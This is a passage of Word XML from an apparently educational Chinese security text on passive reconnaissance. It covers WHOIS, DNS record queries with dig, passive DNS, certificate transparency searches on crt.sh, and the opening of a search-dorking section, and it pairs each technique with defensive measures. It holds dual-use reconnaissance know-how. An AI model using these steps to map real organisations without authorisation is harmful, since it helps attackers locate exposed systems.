      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实施后，许多欧洲域名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据已被大幅精简，但防御者不应将此视为默认保障——仍需主动检查本组织域名的实际暴露情况。蓝队还应定期审查所有已注册域名的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录，确保未遗留过期联系人、旧物理地址或过时的服务器信息，这些残留数据可能被攻击者用于社会工程学攻击。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="dns-记录与被动-dns-数据"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录与被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是互联网的电话簿，也是被动侦察中信息密度最高的数据源之一。在被动模式下，攻击者通过向公共递归解析器（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google 8.8.8.8、Cloudflare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.1.1）发起标准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询来获取目标域名的各类记录，这本身不触碰目标组织的权威</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器，属于标准的用户查询行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录类型包括：A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（域名到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址的映射）、AAAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（域名到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址）、MX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（邮件交换服务器）、NS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（域名服务器）、TXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（文本记录，常包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SPF、DKIM、DMARC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等邮件安全配置）、CNAME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（别名）、SOA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录（授权起始，包含主</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器和管理员邮箱）。每条记录都是拼图的一块：MX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录暴露了邮件基础设施的托管位置与提供商；TXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SPF（Sender</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Policy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Framework）配置有时会泄露出站邮件网关</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和内网</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段（因配置不当导致）；NS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录揭示域名是由自建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">还是第三方托管，间接指示组织的技术能力水平。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询命令使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig A &lt;DOMAIN&gt; @8.8.8.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig MX &lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询邮件服务器；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig ANY &lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试获取所有记录（①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注意：现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器多已禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ANY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询，以防范反射放大攻击，此为防御配置而非漏洞）。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体查询结果因目标的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置和地理分布而异，应以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位符进行教学演示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS（Passive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS）是一种更进阶的侦察手段。被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据由第三方传感器网络长期收集真实的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析流量，聚合形成历史数据库。攻击者通过查询被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal、SecurityTrails），可以获取某个域名历史上解析过的所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址，或反过来查询某个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上托管过的所有域名。这种数据关联能力极强：它可以帮助攻击者发现目标组织在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CDN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加速背后的真实源站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、发现已废弃但未注销的子域、或发现共享同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段的其他相关资产。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据的收集原理基于实际的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析流量，是标准行为；②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体数据的完整性和时效性取决于数据源的覆盖范围。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御方面，组织应定期使用被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务审查自身域名的历史记录，识别可能泄露内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或敏感服务的历史解析记录。对于不再使用的子域，应及时清理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录而非仅仅停止服务。蓝队还应将被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询能力融入其威胁情报工作流，监控是否有新域名被绑定到本组织的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">段。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="76" w:name="证书透明日志"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书透明日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书透明（Certificate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Transparency, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CT）是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提出的一项用于增强</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS/SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书可信度的机制，其核心思想是将所有公开可信任的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书记录在公开的、不可篡改的日志中。这意味着，每当一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CA（Certificate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Authority，证书颁发机构）为某个域名颁发证书时，该证书的详细信息——包括域名（以及可能的子域）、证书有效期、签发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CA——都会被永久记录在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中，任何人都可以查询。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于攻击者而言，CT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志是一座金矿。通过查询</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crt.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Censys </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志搜索引擎，攻击者只需输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通配符模式），即可获取该域名历史上所有被签发的证书，进而发现大量子域名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vpn.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dev.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">staging.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。这些子域名称往往直接暴露了内部系统用途与命名规范。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志的公开性和不可删除性是协议设计的核心特性，旨在防范恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">颁发伪造证书。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书中是否包含敏感子域取决于组织的证书管理实践；有些组织使用通配符证书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">*.&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可隐藏具体子域名称，而逐域颁证则会将所有子域暴露在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御措施包括：优先使用通配符证书覆盖所有子域，避免在证书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SAN（Subject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alternative </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Name）字段中暴露详细的内部主机名；定期审查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志中出现的本组织证书，确认无未授权的证书签发（这可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被入侵的信号）；将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志监控纳入蓝队的持续安全运营（SOC）流程。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="77" w:name="搜索引擎语法与-dorking"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索引擎语法与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dorking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索引擎（Google、Bing、DuckDuckGo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）使用爬虫持续索引互联网上的公开页面和文件。攻击者通过精心构造的搜索语法（常被称为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google Dorking </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking），可以从搜索引擎缓存中提取目标组织无意中暴露的敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见的搜索语法包括：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">site:&lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限定搜索范围到目标域名；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">filetype:pdf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
